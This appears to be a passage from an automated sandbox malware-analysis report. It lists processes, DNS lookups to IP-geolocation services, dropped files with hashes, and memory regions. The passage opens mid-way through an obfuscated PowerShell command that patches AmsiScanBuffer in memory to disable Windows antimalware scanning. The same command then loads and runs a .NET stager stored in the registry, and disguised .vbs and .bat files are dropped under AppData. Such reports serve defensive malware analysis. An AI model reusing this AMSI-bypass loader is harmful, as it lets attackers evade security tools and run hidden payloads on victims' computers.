$_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+'o'+''+'s'+'of'+'t'+''+[Char](46)+'W'+'i'+'n'+[Char](51)+''+'2'+'.U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+'e'+'t'+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$vAUrwdBKbAMcoH=$tozNwEtJLckQR.GetMethod(''+[Char](71)+''+'e'+'t'+'P'+'r'+[Char](111)+''+'c'+''+'A'+'d'+'d'+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lHPbjhqexPODLfKoeHm=KZyztRCvrUwz @([String])([IntPtr]);$TFUnynIIlGYICTaVpULKPW=KZyztRCvrUwz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VckgSVTVozX=$tozNwEtJLckQR.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+'odu'+'l'+''+'e'+'H'+[Char](97)+'ndl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$CkSstAhdFKeKCZ=$vAUrwdBKbAMcoH.Invoke($Null,@([Object]$VckgSVTVozX,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'Li'+[Char](98)+'r'+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$PzAIubXFmvBmMQNlt=$vAUrwdBKbAMcoH.Invoke($Null,@([Object]$VckgSVTVozX,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+[Char](117)+'al'+[Char](80)+'ro'+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$xuFFsXS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CkSstAhdFKeKCZ,$lHPbjhqexPODLfKoeHm).Invoke(''+'a'+''+'m'+'s'+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$PhcPYqmyNYejsLWcQ=$vAUrwdBKbAMcoH.Invoke($Null,@([Object]$xuFFsXS,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+'B'+''+'u'+''+'f'+'f'+[Char](101)+''+[Char](114)+'')));$dlZXCITbUf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PzAIubXFmvBmMQNlt,$TFUnynIIlGYICTaVpULKPW).Invoke($PhcPYqmyNYejsLWcQ,[uint32]8,4,[ref]$dlZXCITbUf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PhcPYqmyNYejsLWcQ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PzAIubXFmvBmMQNlt,$TFUnynIIlGYICTaVpULKPW).Invoke($PhcPYqmyNYejsLWcQ,[uint32]8,0x20,[ref]$dlZXCITbUf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+'R'+'E').GetValue(''+'$'+'s'+[Char](120)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{d41ed3f8-1a20-40b6-9235-b2711b4bbf73}

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 freegeoip.net udp
US 8.8.8.8:53 api.ipify.org udp

Files

memory/3572-0-0x0000000074EEE000-0x0000000074EEF000-memory.dmp

memory/3572-1-0x0000000004FB0000-0x0000000004FE6000-memory.dmp

memory/3572-3-0x0000000074EE0000-0x0000000075691000-memory.dmp

memory/3572-2-0x00000000056D0000-0x0000000005CFA000-memory.dmp

memory/3572-4-0x0000000074EE0000-0x0000000075691000-memory.dmp

memory/3572-5-0x00000000055C0000-0x00000000055E2000-memory.dmp

memory/3572-6-0x0000000005DB0000-0x0000000005E16000-memory.dmp

memory/3572-7-0x0000000005E20000-0x0000000005E86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k3cnotmu.snl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3572-16-0x0000000005E90000-0x00000000061E7000-memory.dmp

memory/3572-17-0x0000000006380000-0x000000000639E000-memory.dmp

memory/3572-18-0x0000000006410000-0x000000000645C000-memory.dmp

memory/3572-19-0x0000000007520000-0x0000000007566000-memory.dmp

memory/3572-20-0x0000000007DA0000-0x000000000841A000-memory.dmp

memory/3572-21-0x0000000007720000-0x000000000773A000-memory.dmp

memory/3572-22-0x0000000002E90000-0x0000000002E98000-memory.dmp

memory/3572-23-0x0000000007850000-0x00000000078BE000-memory.dmp

memory/3572-24-0x000000000A9D0000-0x000000000AF76000-memory.dmp

memory/4276-26-0x0000000074EE0000-0x0000000075691000-memory.dmp

memory/4276-27-0x0000000074EE0000-0x0000000075691000-memory.dmp

memory/4276-37-0x0000000071040000-0x000000007108C000-memory.dmp

memory/4276-36-0x0000000007040000-0x0000000007074000-memory.dmp

memory/4276-46-0x00000000070A0000-0x00000000070BE000-memory.dmp

memory/4276-47-0x00000000070D0000-0x0000000007174000-memory.dmp

memory/4276-48-0x0000000074EE0000-0x0000000075691000-memory.dmp

memory/4276-49-0x0000000074EE0000-0x0000000075691000-memory.dmp

memory/4276-50-0x0000000074EE0000-0x0000000075691000-memory.dmp

memory/4276-51-0x0000000007290000-0x000000000729A000-memory.dmp

memory/4276-52-0x00000000074A0000-0x0000000007536000-memory.dmp

memory/4276-53-0x0000000007430000-0x0000000007441000-memory.dmp

memory/4276-54-0x0000000074EE0000-0x0000000075691000-memory.dmp

memory/4276-57-0x0000000074EE0000-0x0000000075691000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 8ba8fc1034d449222856ea8fa2531e28
SHA1 7570fe1788e57484c5138b6cead052fbc3366f3e
SHA256 2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
SHA512 7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b

C:\Users\Admin\AppData\Roaming\Windows_Log_226.vbs

MD5 48e8c64e185f8bf7619af8a300757427
SHA1 85a4517283686860cb731758d435ccda4104ad06
SHA256 c7a41fe5ec651ff2e3be7cf1e88c0fd766778dd590125b2eb79be224a921569e
SHA512 9a7cb2321db3054e13b19476e45db959c0dfb288d2bde3589ecbc0e336710c401140414bc7a562f836a60cb40e4f739180110c449bd009f5036e355a9f36142a

C:\Users\Admin\AppData\Roaming\Windows_Log_226.bat

MD5 d4c582bb5890af020c110f2b1de1d9db
SHA1 04c25b115c7bdaced94746c4acf9b5245f064ea0
SHA256 d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c
SHA512 4b104fd0f62ecab38cc02b4cd77e6b8b5bcaaa3d98ad48f537fc7a67aa7d72d4575026921b63c9a743a41faaf3dd3154717bd6690f87dcb4114da05106b93012

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 3cc9b0f3fc9a41eff931174177f74969
SHA1 a832712ee07ed57d28cf65b11199da5cbe60892e
SHA256 d82f7de921c41141b223a056f22ff5e42535cb05bd63e76ded4f3ccd1f644194
SHA512 402343954a68aa39d18529a3c0c8a3b7f01f36fa3b59756c9480ef1eb27cb042d5cb59214cf166f304655f262166a0d2338e59785f028e126e1fbb504a546c3c

memory/3572-74-0x0000000074EE0000-0x0000000075691000-memory.dmp

memory/2668-77-0x0000000007B50000-0x0000000007BAE000-memory.dmp

memory/2668-78-0x000000000A480000-0x000000000A512000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Install.exe

MD5 b489b7d9efc807fb9583f21f39327fc2
SHA1 1ee42e6c08cd0a51d5c763c6b8771c004b962865
SHA256 6f1bc33cba78e569e98566aa17be4a548c9ed1a6ea0f35a2149ad504def56579
SHA512 53be2dc3574e1da8c643b24e6b982a19f6f2f4748acc38d5c625f66e701c1b4124156983c29668c8bed4c79b5f27d0f932c8a38ebecb33170c283f1161068c2e

memory/2668-86-0x0000000005310000-0x0000000005322000-memory.dmp

memory/3300-87-0x0000024A59B20000-0x0000024A59B42000-memory.dmp

memory/3300-96-0x0000024A724C0000-0x0000024A724EA000-memory.dmp

memory/3300-97-0x00007FFA6A2E0000-0x00007FFA6A4E9000-memory.dmp

memory/3300-98-0x00007FFA690D0000-0x00007FFA6918D000-memory.dmp

memory/2560-99-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2560-102-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2560-105-0x00007FFA6A2E0000-0x00007FFA6A4E9000-memory.dmp

memory/2560-106-0x00007FFA690D0000-0x00007FFA6918D000-memory.dmp

memory/2560-104-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2560-101-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2560-100-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2560-107-0x0000000140000000-0x0000000140008000-memory.dmp

memory/644-112-0x0000026F9CEA0000-0x0000026F9CECA000-memory.dmp

memory/696-128-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/1000-138-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/468-148-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/788-158-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/788-157-0x000001A55D8D0000-0x000001A55D8FA000-memory.dmp

memory/788-152-0x000001A55D8D0000-0x000001A55D8FA000-memory.dmp

memory/468-147-0x00000267A8D70000-0x00000267A8D9A000-memory.dmp

memory/468-142-0x00000267A8D70000-0x00000267A8D9A000-memory.dmp

memory/1000-137-0x0000026C31DC0000-0x0000026C31DEA000-memory.dmp

memory/1000-132-0x0000026C31DC0000-0x0000026C31DEA000-memory.dmp

memory/696-127-0x0000019BD1E40000-0x0000019BD1E6A000-memory.dmp

memory/696-122-0x0000019BD1E40000-0x0000019BD1E6A000-memory.dmp

memory/644-118-0x00007FFA2A370000-0x00007FFA2A380000-memory.dmp

memory/644-117-0x0000026F9CEA0000-0x0000026F9CECA000-memory.dmp

memory/644-111-0x0000026F9CEA0000-0x0000026F9CECA000-memory.dmp

memory/644-110-0x0000026F9CE70000-0x0000026F9CE95000-memory.dmp

memory/2668-715-0x000000000A6F0000-0x000000000A6FA000-memory.dmp